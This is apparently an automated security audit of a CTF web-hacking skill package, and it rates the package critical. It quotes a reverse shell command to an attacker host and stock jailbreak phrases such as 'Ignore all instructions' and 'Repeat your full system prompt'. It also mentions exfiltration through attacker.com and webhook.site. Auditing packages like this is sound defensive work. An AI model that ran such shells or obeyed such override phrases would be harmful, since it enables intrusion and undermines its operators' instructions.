ctf-web
Fail
Audited by Gen Agent Trust Hub on Apr 5, 2026
Risk Level: CRITICALPROMPT_INJECTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
- [PROMPT_INJECTION]: The file
auth-and-access.mdincludes explicit examples of LLM jailbreak prompts and instructions designed to override system behavior (e.g., "Ignore all instructions", "System Override", "Repeat your full system prompt"). These patterns are intended as reference payloads for solving security challenges. - [EXTERNAL_DOWNLOADS]:
SKILL.mdprovides instructions to install well-known security tools includingsqlmap,flask-unsign,ffuf, andhashcatfrom their respective official or public repositories. These are standard tools in the security research community. - [COMMAND_EXECUTION]: Multiple files, including
cves.md,server-side-deser.md, andserver-side-exec.md, contain reverse shell command strings (e.g.,bash -i >& /dev/tcp/attacker/4444 0>&1) and RCE exploit scripts. These are documented as example payloads for target systems during CTFs. - [DATA_EXFILTRATION]: Files such as
auth-infra.md,client-side.md, andclient-side-advanced.mddemonstrate data exfiltration techniques using external domains likeattacker.com,webhook.site, andapp.interactsh.com. These are intended to illustrate how vulnerabilities can be verified via out-of-band interactions.
Recommendations
- Contains 2 malicious URL(s) - DO NOT USE
Audit Metadata